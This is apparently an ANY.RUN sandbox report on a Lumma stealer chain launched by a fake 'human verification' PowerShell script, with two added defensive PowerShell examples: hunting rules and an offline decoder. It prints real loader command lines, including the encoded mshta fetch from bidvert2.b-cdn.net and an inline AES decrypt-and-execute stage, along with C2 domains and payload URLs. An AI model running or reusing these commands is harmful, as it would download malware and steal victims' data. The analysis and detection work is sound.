File name: human-verificati0n.b-cdn.net.ps1
Full analysis: https://app.any.run/tasks/fa3f4043-b7e2-4e3e-9cbd-58ae96dc216c
Verdict: Malicious activity
Threats:

A loader is malicious software that infiltrates devices to deliver malicious payloads. This malware is capable of infecting victims’ computers, analyzing their system information, and installing other types of threats, such as trojans or stealers. Criminals usually deliver loaders through phishing emails and links by relying on social engineering to trick users into downloading and running their executables. Loaders employ advanced evasion and persistence tactics to avoid detection.

Analysis date: August 24, 2024, 20:33:23
OS: Windows 10 Professional (build: 19045, 64 bit)
Tags: loader, stealer, lumma
Indicators:
MIME: text/plain
File info: ASCII text, with no line terminators
MD5: 3CA2D799CCF7CBB3B814D5AFDB90BBA5
SHA1: 17DCE99847E1963D885926DD0C8D48BBF1A97FAA
SHA256: 081A41C0999C054FDF213B6FE7A094A6C32710FBE06F9767C4ADAB1B623AD933
SSDEEP: 3:VSJJLNyAmarBO/tmt55akqizkJCobPROkJ+Egsd:snyuk854kqizkJC6OkUErd

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Bypass execution policy to execute commands

      • powershell.exe (PID: 6764)
    • Scans artifacts that could help determine the target

      • mshta.exe (PID: 7012)
    • Run PowerShell with an invisible window

      • powershell.exe (PID: 6492)
    • Changes powershell execution policy (Unrestricted)

      • mshta.exe (PID: 7012)
    • Uses AES cipher (POWERSHELL)

      • powershell.exe (PID: 6492)
    • Gets or sets the symmetric key that is used for encryption and decryption (POWERSHELL)

      • powershell.exe (PID: 6492)
    • Gets or sets the initialization vector for the symmetric algorithm (POWERSHELL)

      • powershell.exe (PID: 6492)
    • Dynamically loads an assembly (POWERSHELL)

      • powershell.exe (PID: 6492)
    • Downloads the requested resource (POWERSHELL)

      • powershell.exe (PID: 6492)
    • Actions look like stealing of personal data

      • BitLockerToGo.exe (PID: 6972)
    • LUMMA has been detected (YARA)

      • BitLockerToGo.exe (PID: 6972)
  • SUSPICIOUS

    • Application launched itself

      • powershell.exe (PID: 6764)
    • BASE64 encoded PowerShell command has been detected

      • powershell.exe (PID: 6764)
    • Base64-obfuscated command line is found

      • powershell.exe (PID: 6764)
    • Starts POWERSHELL.EXE for commands execution

      • powershell.exe (PID: 6764)
      • mshta.exe (PID: 7012)
    • Process drops legitimate windows executable

      • mshta.exe (PID: 7012)
      • powershell.exe (PID: 6492)
    • Executable content was dropped or overwritten

      • mshta.exe (PID: 7012)
      • powershell.exe (PID: 6492)
    • Drops the executable file immediately after the start

      • mshta.exe (PID: 7012)
      • powershell.exe (PID: 6492)
    • The process bypasses the loading of PowerShell profile settings

      • mshta.exe (PID: 7012)
    • Probably obfuscated PowerShell command line is found

      • mshta.exe (PID: 7012)
    • Gets file extension (POWERSHELL)

      • powershell.exe (PID: 6492)
    • Extracts files to a directory (POWERSHELL)

      • powershell.exe (PID: 6492)
    • Gets or sets the security protocol (POWERSHELL)

      • powershell.exe (PID: 6492)
    • Writes data into a file (POWERSHELL)

      • powershell.exe (PID: 6492)
    • Cryptography encrypted command line is found

      • powershell.exe (PID: 6492)
    • Searches for installed software

      • BitLockerToGo.exe (PID: 6972)
  • INFO

    • Checks proxy server information

      • mshta.exe (PID: 7012)
      • powershell.exe (PID: 6492)
    • Reads Internet Explorer settings

      • mshta.exe (PID: 7012)
    • Gets data length (POWERSHELL)

      • powershell.exe (PID: 6492)
    • Checks whether the specified file exists (POWERSHELL)

      • powershell.exe (PID: 6492)
    • Disables trace logs

      • powershell.exe (PID: 6492)
    • Checks if a key exists in the options dictionary (POWERSHELL)

      • powershell.exe (PID: 6492)
    • The executable file from the user directory is run by the Powershell process

      • 0WhatBotPlus.exe (PID: 7032)
    • Checks supported languages

      • 0WhatBotPlus.exe (PID: 7032)
      • BitLockerToGo.exe (PID: 6972)
    • Reads the software policy settings

      • BitLockerToGo.exe (PID: 6972)
    • Reads the computer name

      • BitLockerToGo.exe (PID: 6972)
    • Reads the machine GUID from the registry

      • BitLockerToGo.exe (PID: 6972)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report

Lumma

(PID) Process: (6972) BitLockerToGo.exe
C2 (9):
condedqpwqm.shop
stagedchheiqwo.shop
traineiwnqo.shop
locatedblsoqp.shop
onionoowzwqm.shop
caffegclasiqwp.shop
evoliutwoqm.shop
millyscroqwp.shop
stamppreewntnq.shop
All screenshots are available in the full report
Total processes: 130
Monitored processes: 8
Malicious processes: 6
Suspicious processes: 0

Behavior graph

start
  • powershell.exe (PID 6764, no specs; parent explorer.exe)
    • conhost.exe (PID 6772, no specs)
    • powershell.exe (PID 6900, no specs)
      • mshta.exe (PID 7012)
        • powershell.exe (PID 6492)
          • conhost.exe (PID 6496, no specs)
          • 0whatbotplus.exe (PID 7032, no specs)
            • bitlockertogo.exe (PID 6972) #LUMMA
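Added example, not part of the ANY.RUN report: the chain above (explorer.exe, then powershell.exe -ep bypass on the downloaded .ps1, then powershell.exe -eC, then mshta.exe with a remote URL, then powershell.exe -w 1 -ep Unrestricted -nop with an inline AES decrypt, then an installer run from %LOCALAPPDATA%\Temp, then BitLockerToGo.exe carrying Lumma) written as hunting rules over process-creation telemetry. The records fed to the function are constructed by hand from the PIDs and command lines in this report plus one benign control row; the rule names, field names (loosely Sysmon Event ID 1 / Security 4688) and regexes are this example's own choices, not ANY.RUN signatures.

```powershell
# Added example (not from the report): hunting rules for this process chain, run over
# constructed process-creation records. Nothing here reads a real event log.

function Find-MshtaPowerShellChain {
    param([Parameter(Mandatory)][object[]]$Events)

    # Nested helper; $e is read dynamically from the enclosing loop iteration.
    function New-Hit($Rule, $Detail) {
        [pscustomobject]@{ ProcessId = $e.ProcessId; Image = $e.Image; Rule = $Rule; Detail = $Detail }
    }

    foreach ($e in $Events) {
        $cl = [string]$e.CommandLine

        if ($e.Image -eq 'mshta.exe' -and $cl -match 'https?://\S+') {
            New-Hit 'mshta.exe launched with a remote URL' $Matches[0]
        }

        if ($e.Image -eq 'powershell.exe') {
            if ($e.ParentImage -eq 'mshta.exe') {
                New-Hit 'powershell.exe spawned by mshta.exe' $e.ParentImage
            }
            # -ep / -ExecutionPolicy override. PowerShell accepts any unambiguous prefix
            # (-ex, -exec, ...), so a production rule should be looser than this one.
            if ($cl -match '\s-e(p|xecutionpolicy)\s+(bypass|unrestricted)\b') {
                $flags = @($Matches[2].ToLower())
                if ($cl -match '\s-w(indowstyle)?\s+(1|h|hidden)\b') { $flags += 'hidden-window' }
                if ($cl -match '\s-nop(rofile)?\b')                  { $flags += 'no-profile' }
                New-Hit 'execution policy override' ($flags -join ', ')
            }
            if ($cl -match '\s-e(c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})') {
                New-Hit 'encoded command' "$($Matches[2].Length) base64 chars"
            }
            if ($cl -match 'Cryptography\.Aes\]::Create\(\)' -and $cl -match 'TransformFinalBlock') {
                New-Hit 'inline AES decrypt of next stage' 'Aes::Create + TransformFinalBlock'
            }
        }

        if ($e.ParentImage -eq 'powershell.exe' -and $cl -match '\\AppData\\Local\\Temp\\[^\\"]+\.exe') {
            New-Hit 'PowerShell ran an executable from %LOCALAPPDATA%\Temp' $Matches[0]
        }

        # BitLockerToGo.exe is a signed Windows binary; in this report it carries Lumma and is
        # started by the dropped installer. Tune the parent allow-list to your environment.
        if ($e.Image -eq 'BitLockerToGo.exe' -and $e.ParentImage -notin @('explorer.exe', 'svchost.exe')) {
            New-Hit 'BitLockerToGo.exe with unexpected parent' $e.ParentImage
        }
    }
}

# Constructed records: PIDs and command lines taken from this report, one benign control row added.
$events = @(
    [pscustomobject]@{ ProcessId = 6764; Image = 'powershell.exe';    ParentImage = 'explorer.exe';     CommandLine = '"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep bypass C:\Users\admin\Desktop\human-verificati0n.b-cdn.net.ps1' }
    [pscustomobject]@{ ProcessId = 6900; Image = 'powershell.exe';    ParentImage = 'powershell.exe';   CommandLine = '"C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -eC bQBzAGgAdABhACAAIgBoAHQAdABwAHMAOgAvAC8AYgBpAGQAdgBlAHIAdAAyAC4AYgAtAGMAZABuAC4AbgBlAHQALwBzAG0AYQByAHQAMQAxACIA' }
    [pscustomobject]@{ ProcessId = 7012; Image = 'mshta.exe';         ParentImage = 'powershell.exe';   CommandLine = '"C:\WINDOWS\system32\mshta.exe" https://bidvert2.b-cdn.net/smart11' }
    # PID 6492's real command line is several KB long; this row keeps only its head and tail.
    [pscustomobject]@{ ProcessId = 6492; Image = 'powershell.exe';    ParentImage = 'mshta.exe';        CommandLine = '"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function KtBvFp($eFnJhB){...};$tPhmg = [System.Security.Cryptography.Aes]::Create();$tPhmg.Key = KtBvFp(''564D477773755066636B4D7050706C41'');...TransformFinalBlock(...);& $HCgvJhSCY.Substring(0,3) $HCgvJhSCY.Substring(3)' }
    [pscustomobject]@{ ProcessId = 7032; Image = '0WhatBotPlus.exe';  ParentImage = 'powershell.exe';   CommandLine = '"C:\Users\admin\AppData\Local\Temp\0WhatBotPlus.exe"' }
    [pscustomobject]@{ ProcessId = 6972; Image = 'BitLockerToGo.exe'; ParentImage = '0WhatBotPlus.exe'; CommandLine = '"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"' }
    # Benign control: scheduled script with -NoProfile but no policy override, hidden window or encoding.
    [pscustomobject]@{ ProcessId = 4444; Image = 'powershell.exe';    ParentImage = 'svchost.exe';      CommandLine = 'powershell.exe -NoProfile -File C:\Scripts\nightly-backup.ps1' }
)

Find-MshtaPowerShellChain -Events $events | Format-Table -AutoSize -Wrap
```

Every malicious row produces at least one hit and the control row produces none; PID 6492 alone trips three rules (policy override with hidden window and no profile, mshta parent, inline AES), which is the combination worth alerting on even when each flag is individually common in administrative scripts.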

Process information

PID: 6492
CMD: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function KtBvFp($eFnJhB){return -split ($eFnJhB -replace '..', '0x$& ')};$bNGwFCyX = KtBvFp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tPhmg = [System.Security.Cryptography.Aes]::Create();$tPhmg.Key = KtBvFp('564D477773755066636B4D7050706C41');$tPhmg.IV = New-Object byte[] 16;$amaPHyLq = $tPhmg.CreateDecryptor();$OmSZlNHiw = $amaPHyLq.TransformFinalBlock($bNGwFCyX, 0, $bNGwFCyX.Length);$HCgvJhSCY = [System.Text.Encoding]::Utf8.GetString($OmSZlNHiw);$amaPHyLq.Dispose();& $HCgvJhSCY.Substring(0,3) $HCgvJhSCY.Substring(3)
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Parent process: mshta.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\atl.dll
c:\windows\system32\user32.dll
PID: 6496
CMD: \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1
Path: C:\Windows\System32\conhost.exe
Parent process: powershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
PID: 6764
CMD: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep bypass C:\Users\admin\Desktop\human-verificati0n.b-cdn.net.ps1
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Parent process: explorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\atl.dll
c:\windows\system32\user32.dll
PID: 6772
CMD: \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1
Path: C:\Windows\System32\conhost.exe
Parent process: powershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
PID: 6900
CMD: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -eC bQBzAGgAdABhACAAIgBoAHQAdABwAHMAOgAvAC8AYgBpAGQAdgBlAHIAdAAyAC4AYgAtAGMAZABuAC4AbgBlAHQALwBzAG0AYQByAHQAMQAxACIA
(the -eC argument is base64 of UTF-16LE text and decodes to: mshta "https://bidvert2.b-cdn.net/smart11")
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Parent process: powershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\atl.dll
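Added example, not part of the ANY.RUN report or of the sample: an offline, defanged decoder for the two command-line encodings in this chain. Stage one (PID 6900) is PowerShell's -eC / -EncodedCommand, base64 over UTF-16LE text; decoding the argument from the report yields the mshta.exe command line of PID 7012. Stage two (PID 6492) turns a hex string into bytes with the -replace '..', '0x$& ' idiom, uses the 16 bytes as an AES key with an all-zero IV (New-Object byte[] 16) in the .NET default mode, CBC with PKCS7 padding, and then calls the first three characters of the plaintext as a command with the remainder as its argument. The encrypted blob is removed from this extract, so the script encrypts a constructed placeholder stage with the recovered key only to have something to decode; the verb 'iex' in that placeholder is an assumption, the real stage's verb is not visible in the report. The sample's final '&' is replaced by printing.

```powershell
# Added example (not from the report or the sample): analyst-side decoder.
# Runs in Windows PowerShell 5.1 or PowerShell 7; nothing here executes the recovered text.

# Stage A: -eC / -EncodedCommand is base64 over UTF-16LE ("Unicode" in .NET).
function ConvertFrom-EncodedCommand {
    param([Parameter(Mandatory)][string]$Base64)
    [System.Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($Base64))
}

# Stage B: the sample's KtBvFp helper does
#   -split ($s -replace '..', '0x$& ')    # "564D..." -> "0x56 0x4D ..." -> string[] -> [byte[]] on assignment
# which yields the same bytes as parsing each hex pair directly:
function ConvertFrom-HexString {
    param([Parameter(Mandatory)][string]$Hex)
    $bytes = for ($i = 0; $i -lt $Hex.Length; $i += 2) {
        [Convert]::ToByte($Hex.Substring($i, 2), 16)
    }
    ,[byte[]]$bytes
}

# Stage C: AES with the recovered key and a zero IV. Aes.Create() defaults to CBC/PKCS7,
# and assigning a 16-byte Key selects AES-128.
function Unprotect-Stage {
    param([Parameter(Mandatory)][byte[]]$CipherText, [Parameter(Mandatory)][byte[]]$Key)
    $aes = [System.Security.Cryptography.Aes]::Create()
    try {
        $aes.Key = $Key
        $aes.IV  = New-Object byte[] 16          # all zeros, exactly as in the sample
        $dec = $aes.CreateDecryptor()
        try     { $plain = $dec.TransformFinalBlock($CipherText, 0, $CipherText.Length) }
        finally { $dec.Dispose() }
        [System.Text.Encoding]::UTF8.GetString($plain)
    } finally { $aes.Dispose() }
}

# Only used to build a constructed stand-in: the real ciphertext is not in this extract.
function Protect-Stage {
    param([Parameter(Mandatory)][byte[]]$PlainText, [Parameter(Mandatory)][byte[]]$Key)
    $aes = [System.Security.Cryptography.Aes]::Create()
    try {
        $aes.Key = $Key
        $aes.IV  = New-Object byte[] 16
        $enc = $aes.CreateEncryptor()
        try     { ,$enc.TransformFinalBlock($PlainText, 0, $PlainText.Length) }
        finally { $enc.Dispose() }
    } finally { $aes.Dispose() }
}

# --- Stage A on the PID 6900 argument (copied from the report) ---
$encoded = 'bQBzAGgAdABhACAAIgBoAHQAdABwAHMAOgAvAC8AYgBpAGQAdgBlAHIAdAAyAC4AYgAtAGMAZABuAC4AbgBlAHQALwBzAG0AYQByAHQAMQAxACIA'
"PID 6900 -eC decodes to: $(ConvertFrom-EncodedCommand $encoded)"

# --- Stage B/C on the PID 6492 key (copied from the report) ---
$key = ConvertFrom-HexString '564D477773755066636B4D7050706C41'
"Key: $($key.Length) bytes => AES-128; as ASCII: $([System.Text.Encoding]::ASCII.GetString($key))"

# Constructed placeholder stage; 'iex' is an assumed verb, the real one is not shown in the report.
$placeholder = [System.Text.Encoding]::UTF8.GetBytes('iexWrite-Host "stage 2 would run here"')
$blob  = Protect-Stage -PlainText $placeholder -Key $key
$stage = Unprotect-Stage -CipherText $blob -Key $key

# The sample ends with:  & $HCgvJhSCY.Substring(0,3) $HCgvJhSCY.Substring(3)
# i.e. the first three characters are the command and the rest is its argument. Print instead:
"Verb:     $($stage.Substring(0, 3))"
"Argument: $($stage.Substring(3))"
```

To decode the real blob, replace the Protect-Stage call with the bytes recovered from the full command line (or from a PowerShell script block log, Event ID 4104, which records the decrypted text once it is invoked) and keep the zero IV; because the IV is fixed and the key is embedded in the command line, the stage can be decrypted from the process-creation event alone, with no memory capture.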
PID: 6972
CMD: "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
Path: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
Parent process: 0WhatBotPlus.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
BitLocker To Go Reader
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\bitlockerdiscoveryvolumecontents\bitlockertogo.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\user32.dll
c:\windows\syswow64\win32u.dll
PID: 7012
CMD: "C:\WINDOWS\system32\mshta.exe" https://bidvert2.b-cdn.net/smart11
Path: C:\Windows\System32\mshta.exe
Parent process: powershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft (R) HTML Application host
Exit code:
0
Version:
11.00.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\mshta.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\wldp.dll
PID: 7032
CMD: "C:\Users\admin\AppData\Local\Temp\0WhatBotPlus.exe"
Path: C:\Users\admin\AppData\Local\Temp\0WhatBotPlus.exe
Parent process: powershell.exe
User:
admin
Company:
WhatBotPlus
Integrity Level:
MEDIUM
Description:
WhatBotPlus Setup
Exit code:
666
Version:
Modules
Images
c:\users\admin\appdata\local\temp\0whatbotplus.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\bcryptprimitives.dll
c:\windows\syswow64\powrprof.dll
Total events: 31 176
Read events: 30 897
Write events: 279
Delete events: 0

Modification events

PID (process) | Operation | Key | Name = Value
PID 7012 (mshta.exe) | write | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap | ProxyBypass = 1
PID 7012 (mshta.exe) | write | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap | IntranetName = 1
PID 7012 (mshta.exe) | write | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap | UNCAsIntranet = 1
PID 7012 (mshta.exe) | write | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap | AutoDetect = 0
PID 7012 (mshta.exe) | write | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content | CachePrefix = (empty)
PID 7012 (mshta.exe) | write | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies | CachePrefix = Cookie:
PID 7012 (mshta.exe) | write | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History | CachePrefix = Visited:
PID 6492 (powershell.exe) | write | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32 | EnableFileTracing = 0
PID 6492 (powershell.exe) | write | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32 | EnableAutoFileTracing = 0
PID 6492 (powershell.exe) | write | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32 | EnableConsoleTracing = 0
Executable files: 8
Suspicious files: 5
Text files: 6
Unknown types: 0

Dropped files

PID | Process | Filename | Type
6764 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\70C2GAL45V7KZQHJYSSL.temp | binary
  MD5: C5AE9AC2C381A2C7D96C3675AEC8BA5C
  SHA256: A66F0A8072BBD35883CB01E3B0A851D471BE7992EFA75FCC17595C8935C2FB0F
6764 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms~RF11e1e1.TMP | binary
  MD5: D040F64E9E7A2BB91ABCA5613424598E
  SHA256: D04E0A6940609BD6F3B561B0F6027F5CA4E8C5CF0FB0D0874B380A0374A8D670
6900 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_dcj4jp3y.3fl.ps1 | text
  MD5: D17FE0A3F47BE24A6453E9EF58C94641
  SHA256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
6492 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_5jedc0kc.nxt.psm1 | text
  MD5: D17FE0A3F47BE24A6453E9EF58C94641
  SHA256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
6492 | powershell.exe | C:\Users\admin\AppData\Local\Temp\smart1.zip | compressed
  MD5: D4FB28BDF42F016C7CA78ECA6AB763B5
  SHA256: 879D758BC82D3001F4E75730FC6E62887FC4469B602ABB2A515ADFD52FBE5549
6900 | powershell.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | binary
  MD5: FEEDE15A8EE5ADACA8C0BF802D671C69
  SHA256: 4DF61DD6E4A2C48344A885B469424F3EDFBB512445D952AB22432E0D266504A9
6492 | powershell.exe | C:\Users\admin\AppData\Local\Temp\wxmsw32u_xrc_gcc_custom.dll | executable
  MD5: 923E97F86B22ABCB602F6AB16D2B0293
  SHA256: 95E36F082AC1BD2EE75C7C3D7371C8332CD5F36B3AF0E4146689EE8790E7F244
6492 | powershell.exe | C:\Users\admin\AppData\Local\Temp\comdlg32.dll | executable
  MD5: E09249B56EB1DB773B12866A205A7078
  SHA256: 5B6129DE2C4A5D7E647728D3B09CBD26214D02B15A2EC8FB07888D3361101166
6492 | powershell.exe | C:\Users\admin\AppData\Local\Temp\0WhatBotPlus.exe | executable
  MD5: F1D21AB58BB1FDBF921EF77E00F7C4B2
  SHA256: D55BF242CF55B18737F72327EA752D3657A5B7C79BC2F71A27C7533FF7BE4C3F
6492 | powershell.exe | C:\Users\admin\AppData\Local\Temp\wvrcimprov.dll | executable
  MD5: 3FA3F6F84B1ACB7CFBE329CFEAD0687A
  SHA256: EF464FA7D015CD47C1AE7115676B7B3B8327AB6DB3C35562E2CEE79EA116372E
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests: 2
TCP/UDP connections: 23
DNS requests: 5
Threats: 0

HTTP requests

Method | HTTP code | IP | URL | CN | Type | Size | Reputation
GET | 200 | 138.199.36.9:443 | https://bidvert2.b-cdn.net/smart11 | unknown | executable | 164 Kb | unknown
GET | 200 | 138.199.36.9:443 | https://bidvert2.b-cdn.net/smart1.zip | unknown | compressed | 10.0 Mb | unknown

Connections

PID | Process | IP | Domain | ASN | CN | Reputation
3412 | svchost.exe | 40.127.240.158:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | IE | unknown
 | | 192.168.100.255:138 | | | | whitelisted
2096 | RUXIMICS.exe | 40.127.240.158:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | IE | unknown
2120 | MoUsoCoreWorker.exe | 40.127.240.158:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | IE | unknown
3888 | svchost.exe | 239.255.255.250:1900 | | | | whitelisted
7012 | mshta.exe | 138.199.36.11:443 | bidvert2.b-cdn.net | Datacamp Limited | DE | unknown
4324 | svchost.exe | 40.127.240.158:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | IE | unknown
6492 | powershell.exe | 138.199.36.11:443 | bidvert2.b-cdn.net | Datacamp Limited | DE | unknown
6972 | BitLockerToGo.exe | 188.114.97.3:443 | onionoowzwqm.shop | CLOUDFLARENET | NL | unknown

DNS requests

Domain | IP | Reputation
settings-win.data.microsoft.com | 40.127.240.158 | whitelisted
google.com | 142.250.186.174 | whitelisted
bidvert2.b-cdn.net | 138.199.36.11 | whitelisted
onionoowzwqm.shop | 188.114.97.3, 188.114.96.3 | malicious

Threats

No threats detected
No debug info